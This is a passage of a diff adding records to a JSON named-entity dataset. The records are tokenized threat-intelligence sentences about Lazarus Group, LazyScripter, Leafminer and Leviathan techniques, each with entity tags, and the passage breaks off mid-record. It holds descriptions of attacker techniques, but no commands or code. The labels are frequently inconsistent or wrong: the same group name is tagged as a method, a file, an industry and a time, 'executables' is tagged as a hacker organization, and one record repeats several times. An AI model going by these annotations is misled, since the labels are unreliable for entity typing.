"used", + "PowerShell", + "to", + "execute", + "commands", + "and", + "malicious", + "code." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Several", + "Lazarus", + "Group", + "malware", + "families", + "gather", + "a", + "list", + "of", + "running", + "processes", + "on", + "a", + "victim", + "system", + "and", + "send", + "it", + "to", + "their", + "C2", + "server.", + "A", + "Destover-like", + "variant", + "used", + "by", + "Lazarus", + "Group", + "also", + "gathers", + "process", + "times." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "also", + "uses", + "a", + "unique", + "form", + "of", + "communication", + "encryption", + "known", + "as", + "FakeTLS", + "that", + "mimics", + "TLS", + "but", + "uses", + "a", + "different", + "encryption", + "method,", + "potentially", + "evading", + "SSL", + "traffic", + "inspection/decryption." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "IndiaIndia", + "checks", + "Registry", + "keys", + "within", + "HKCU", + "and", + "HKLM", + "to", + "determine", + "if", + "certain", + "applications", + "are", + "present,", + "including", + "SecureCRT,", + "Terminal", + "Services,", + "RealVNC,", + "TightVNC,", + "UltraVNC,", + "Radmin,", + "mRemote,", + "TeamViewer,", + "FileZilla,", + "pcAnyware,", + "and", + "Remote", + "Desktop.", + "Another", + "Lazarus", + "Group", + "malware", + "sample", + "checks", + "for", + "the", + "presence", + "of", + "the", + "following", + "Registry", + "key:<code>HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt</code>." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Idus", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "changed", + "memory", + "protection", + "permissions", + "then", + "overwritten", + "in", + "memory", + "DLL", + "function", + "code", + "with", + "shellcode,", + "which", + "was", + "later", + "executed", + "via", + "KernelCallbackTable", + "hijacking.", + "Lazarus", + "Group", + "has", + "also", + "used", + "shellcode", + "within", + "macros", + "to", + "decrypt", + "and", + "manually", + "map", + "DLLs", + "into", + "memory", + "at", + "runtime." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "maintained", + "persistence", + "by", + "loading", + "malicious", + "code", + "into", + "a", + "startup", + "folder", + "or", + "by", + "adding", + "a", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "SierraCharlie", + "uses", + "RDP", + "for", + "propagation." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "renamed", + "system", + "utilities", + "such", + "as", + "<code>wscript.exe</code>", + "and", + "<code>mshta.exe</code>." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "rundll32", + "to", + "execute", + "malicious", + "payloads", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "SierraAlfa", + "accesses", + "the", + "<code>ADMIN$</code>", + "share", + "via", + "SMB", + "to", + "conduct", + "lateral", + "movement." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "used", + "SSH", + "and", + "the", + "PuTTy", + "PSCP", + "utility", + "to", + "gain", + "access", + "to", + "a", + "restricted", + "segment", + "of", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "<code>schtasks</code>", + "for", + "persistence", + "including", + "through", + "the", + "periodic", + "execution", + "of", + "a", + "remote", + "XSL", + "script", + "or", + "a", + "dropped", + "VBS", + "payload." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "compromised", + "servers", + "to", + "stage", + "malicious", + "tools." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "stopped", + "the", + "MSExchangeIS", + "service", + "to", + "render", + "Exchange", + "contents", + "inaccessible", + "to", + "users." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "has", + "maintained", + "persistence", + "on", + "a", + "system", + "by", + "creating", + "a", + "LNK", + "shortcut", + "in", + "the", + "user’s", + "Startup", + "folder." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "created", + "new", + "Twitter", + "accounts", + "to", + "conduct", + "social", + "engineering", + "against", + "potential", + "victims." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "targeted", + "victims", + "with", + "spearphishing", + "emails", + "containing", + "malicious", + "Microsoft", + "Word", + "documents." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "I-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "sent", + "malicious", + "links", + "to", + "victims", + "via", + "email." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "social", + "media", + "platforms,", + "including", + "LinkedIn", + "and", + "Twitter,", + "to", + "send", + "spearphishing", + "messages." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "A", + "Lazarus", + "Group", + "malware", + "sample", + "encodes", + "data", + "with", + "base64." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Several", + "Lazarus", + "Group", + "malware", + "families", + "encrypt", + "C2", + "traffic", + "using", + "custom", + "code", + "that", + "uses", + "XOR", + "with", + "an", + "ADD", + "operation", + "and", + "XOR", + "with", + "a", + "SUB", + "operation.", + "Another", + "Lazarus", + "Group", + "malware", + "sample", + "XORs", + "C2", + "traffic.", + "Other", + "Lazarus", + "Group", + "malware", + "uses", + "Caracachs", + "encryption", + "to", + "encrypt", + "C2", + "payloads.", + "Lazarus", + "Group", + "has", + "also", + "used", + "AES", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "lnk", + "files", + "used", + "for", + "persistence", + "have", + "abused", + "the", + "Windows", + "Update", + "Client", + "(<code>wuauclt.exe</code>)", + "to", + "execute", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "Several", + "Lazarus", + "Group", + "malware", + "families", + "collect", + "information", + "on", + "the", + "type", + "and", + "version", + "of", + "the", + "victim", + "OS,", + "as", + "well", + "as", + "the", + "victim", + "computer", + "name", + "and", + "CPU", + "information.", + "A", + "Destover-like", + "variant", + "used", + "by", + "Lazarus", + "Group", + "also", + "collects", + "disk", + "space", + "information", + "and", + "sends", + "it", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Purp", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "IndiaIndia", + "obtains", + "and", + "sends", + "to", + "its", + "C2", + "server", + "information", + "about", + "the", + "first", + "network", + "interface", + "card’s", + "configuration,", + "including", + "IP", + "address,", + "gateways,", + "subnet", + "mask,", + "DHCP", + "information,", + "and", + "whether", + "WINS", + "is", + "available." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "<code>net", + "use</code>", + "to", + "identify", + "and", + "establish", + "a", + "network", + "connection", + "with", + "a", + "remote", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Various", + "Lazarus", + "Group", + "malware", + "enumerates", + "logged-on", + "users." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "rebooted", + "systems", + "after", + "destroying", + "files", + "and", + "wiping", + "the", + "MBR", + "on", + "infected", + "systems." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Destover-like", + "implant", + "used", + "by", + "Lazarus", + "Group", + "can", + "obtain", + "the", + "current", + "system", + "time", + "and", + "send", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Several", + "Lazarus", + "Group", + "malware", + "families", + "use", + "timestomping,", + "including", + "modifying", + "the", + "last", + "write", + "timestamp", + "of", + "a", + "specified", + "Registry", + "key", + "to", + "a", + "random", + "date,", + "as", + "well", + "as", + "copying", + "the", + "timestamp", + "for", + "legitimate", + ".exe", + "files", + "(such", + "as", + "calc.exe", + "or", + "mspaint.exe)", + "to", + "its", + "dropped", + "files." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "obtained", + "a", + "variety", + "of", + "tools", + "for", + "their", + "operations,", + "including", + "Responder", + "and", + "PuTTy", + "PSCP." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "administrator", + "credentials", + "to", + "gain", + "access", + "to", + "restricted", + "network", + "segments." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "VBA", + "and", + "embedded", + "macros", + "in", + "Word", + "documents", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "conducted", + "C2", + "over", + "HTTP", + "and", + "HTTPS." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "hosted", + "malicious", + "downloads", + "on", + "Github." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "malware", + "uses", + "cmd.exe", + "to", + "execute", + "commands", + "on", + "a", + "compromised", + "host.", + "A", + "Destover-like", + "variant", + "used", + "by", + "Lazarus", + "Group", + "uses", + "a", + "batch", + "file", + "mechanism", + "to", + "delete", + "its", + "binaries", + "from", + "the", + "system." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lazarus", + "Group", + "has", + "used", + "WMIC", + "for", + "discovery", + "as", + "well", + "as", + "to", + "execute", + "payloads", + "for", + "persistence", + "and", + "lateral", + "movement." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Several", + "Lazarus", + "Group", + "malware", + "families", + "install", + "themselves", + "as", + "new", + "services." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "leveraged", + "the", + "BatchEncryption", + "tool", + "to", + "perform", + "advanced", + "batch", + "script", + "obfuscation", + "and", + "encoding", + "techniques." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "leveraged", + "dynamic", + "DNS", + "providers", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "I-Org", + "B-Purp", + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "dynamic", + "DNS", + "providers", + "to", + "create", + "legitimate-looking", + "subdomains", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Org", + "B-Purp", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "had", + "downloaded", + "additional", + "tools", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "JavaScript", + "in", + "its", + "attacks." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "lured", + "users", + "to", + "open", + "malicious", + "email", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "links", + "to", + "malicious", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "a", + "variety", + "of", + "open-source", + "remote", + "access", + "Trojans", + "for", + "its", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "several", + "different", + "security", + "software", + "icons", + "to", + "disguise", + "executables." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "`mshta.exe`", + "to", + "execute", + "Koadic", + "stagers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "PowerShell", + "scripts", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "achieved", + "persistence", + "via", + "writing", + "a", + "PowerShell", + "script", + "to", + "the", + "autorun", + "registry", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "`rundll32.exe`", + "to", + "execute", + "Koadic", + "stagers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "spam", + "emails", + "weaponized", + "with", + "archive", + "or", + "document", + "files", + "as", + "its", + "initial", + "infection", + "vector." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "spam", + "emails", + "that", + "contain", + "a", + "link", + "that", + "redirects", + "the", + "victim", + "to", + "download", + "a", + "malicious", + "document." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "hosted", + "open-source", + "remote", + "access", + "Trojans", + "used", + "in", + "its", + "operations", + "in", + "GitHub." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "VBScript", + "to", + "execute", + "malicious", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "GitHub", + "to", + "host", + "its", + "payloads", + "to", + "operate", + "spam", + "campaigns." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "established", + "GitHub", + "accounts", + "to", + "host", + "its", + "toolsets." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LazyScripter", + "has", + "used", + "batch", + "files", + "to", + "deploy", + "open-source", + "and", + "multi-stage", + "RATs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "several", + "tools", + "for", + "retrieving", + "login", + "and", + "password", + "information,", + "including", + "LaZagne." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leafminer", + "obfuscated", + "scripts", + "that", + "were", + "used", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "several", + "tools", + "for", + "retrieving", + "login", + "and", + "password", + "information,", + "including", + "LaZagne." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "several", + "tools", + "for", + "retrieving", + "login", + "and", + "password", + "information,", + "including", + "LaZagne." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "several", + "tools", + "for", + "retrieving", + "login", + "and", + "password", + "information,", + "including", + "LaZagne." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leafminer", + "has", + "infected", + "victims", + "using", + "watering", + "holes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "a", + "tool", + "called", + "MailSniper", + "to", + "search", + "for", + "files", + "on", + "the", + "desktop", + "and", + "another", + "utility", + "called", + "Sobolsoft", + "to", + "extract", + "attachments", + "from", + "EML", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leafminer", + "infected", + "victims", + "using", + "JavaScript", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "several", + "tools", + "for", + "retrieving", + "login", + "and", + "password", + "information,", + "including", + "LaZagne." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "several", + "tools", + "for", + "retrieving", + "login", + "and", + "password", + "information,", + "including", + "LaZagne", + "and", + "Mimikatz." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "a", + "tool", + "called", + "Imecab", + "to", + "set", + "up", + "a", + "persistent", + "remote", + "access", + "account", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leafminer", + "scanned", + "network", + "services", + "to", + "search", + "for", + "vulnerabilities", + "in", + "the", + "victim", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "a", + "tool", + "called", + "Total", + "SMB", + "BruteForcer", + "to", + "perform", + "internal", + "password", + "spraying." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leafminer", + "has", + "used", + "Process", + "Doppelgänging", + "to", + "evade", + "security", + "software", + "while", + "deploying", + "tools", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "a", + "tool", + "called", + "MailSniper", + "to", + "search", + "through", + "the", + "Exchange", + "server", + "mailboxes", + "for", + "keywords." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leafminer", + "used", + "Microsoft’s", + "Sysinternals", + "tools", + "to", + "gather", + "detailed", + "information", + "about", + "remote", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leafminer", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "LaZagne,", + "Mimikatz,", + "PsExec,", + "and", + "MailSniper." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "archived", + "victim's", + "data", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "BITSAdmin", + "to", + "download", + "additional", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "inserted", + "garbage", + "characters", + "into", + "code,", + "presumably", + "to", + "avoid", + "anti-virus", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "stolen", + "code", + "signing", + "certificates", + "to", + "sign", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-OffAct", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "collected", + "compromised", + "credentials", + "to", + "use", + "for", + "targeting", + "efforts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leviathan", + "has", + "used", + "a", + "DLL", + "known", + "as", + "SeDll", + "to", + "decrypt", + "and", + "execute", + "other", + 